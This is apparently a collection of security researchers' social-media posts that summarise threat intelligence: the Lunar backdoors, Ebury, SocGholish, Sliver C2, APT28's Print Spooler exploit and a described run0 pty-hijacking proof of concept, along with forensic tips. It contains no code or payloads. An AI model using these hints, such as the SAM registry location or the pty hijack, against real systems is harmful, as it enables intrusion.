#ESETresearch has discovered the Lunar toolset, two previously unknown backdoors (which we named #LunarWeb and #LunarMail ) possibly linked to Turla, compromising a European MFA and its diplomatic missions abroad. welivesecurity.com/en/eset-resear… 1/6

#Breaking #ESETresearch releases a paper about Ebury, among the most advanced server-side Linux malware, which was deployed to 400,000 servers over the course of 15 years, primarily for financial gain. Marc-Etienne M.Léveillé welivesecurity.com/en/eset-resear… 1/8

Group-IB TI team detected that:
1) #404TDS moved from distributing malicious links via email to injecting malicious code into compromised websites to redirect visitors
2) #SocGholish cybercrime group uses #404TDS infrastructure as 3rd party provider to deliver their initial stage

Guntior - the story of an advanced bootkit that doesn't rely on Windows disk drivers : artemonsecurity.blogspot.com/2024/04/guntio… credits Artem I. Baranov

In-depth examination of the Sliver C2 framework.

I highly recommend reading this series for every BlueTeamer to understand the internals and building blocks of a (modern) C2 framework.

dominicbreuker.com/post/learning_…

Making my computer unhackable after realizing 'Security questions' are actually UTF-16LE JSON stored as ResetData REG_BINARY in HKLM\SAM\SAM\Domains\Account\Users\...

New blog post: Today I Learned - Zsh History Timestamps
dfir.ch/posts/today_i_…

In Zsh, the shell session retains the command history with timestamps in memory. Each executed command is logged in the history along with a timestamp denoting its execution time.

Kapeka: A new toolkit in Arsenal of SandStorm
github.com/blackorbird/AP…

#Kimsuky Exploit Weak DMARC Security Policies to Mask Spearphishing Efforts
github.com/blackorbird/AP…

Google Chrome sends an ETW event when someone tries to read your passwords.
You should enable these events and monitor them.

Lennart Poettering intends to replace 'sudo' with systemd's run0. Here's a quick PoC to demonstrate root permission hijacking by exploiting the fact 'systemd-run' (the basis of uid0/run0, the sudo replacer) creates a user owned pty for communication with the new 'root' process.

This is awesome! Incredibly useful for IR and beats my handmade notes 😆

Thank you to the folks that made this guide public 🙏 🙏

Get the PDF directly from here 🔗 cdn-dynmedia-1.microsoft.com/is/content/mic…

#Botconf2024 Live stream - youtube.com/watch?v=W62Eb5…

Soon we'll say welcome to our new family member, hwdbg. 🛠️⚙️🔲

Hardware Debugger, or #hwdbg , is a new class of event-driven chip debuggers that allows precise signal control down to the period of a single clock cycle.

github.com/HyperDbg/hwdbg

#FPGA #Chip #Hardware #Debugging

Analyzing APT28 custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials
(Windows Print Spooler Elevation of Privilege Vulnerability)
microsoft.com/en-us/security…

Malware review:

2024-02-27- European diplomats targeted by SPIKEDWIRE with WINELOADER

Notes:
*Zscaler on release of this article did not attribute it to any state-sponsored Threat Actor
*Mandiant later attributed this payload to APT29 March, 22nd 2024 in an article titled:

From late 2023 to early 2024, #SharpPanda has continued to target government entities in the Southeast Asia. Group-IB researchers have spotted several initial infection vectors (documents/executables) similar to previous Sharp Panda operations. These malicious files deliver the

If you've ever worked with HyperDbg, you probably know that everything in HyperDbg is treated as an event.

This new debugger is designed to allow us to control the smallest unit in computers which is a clock cycle, so we can execute custom actions for each event (clock).

Really interesting how easy it is to fingerprint TLS connections established from GO applications, by checking JA4 signature patterns.

You'd be amazed how many automated malicious URL scanners also use the same JA4 signature.

From: github.com/FoxIO-LLC/ja4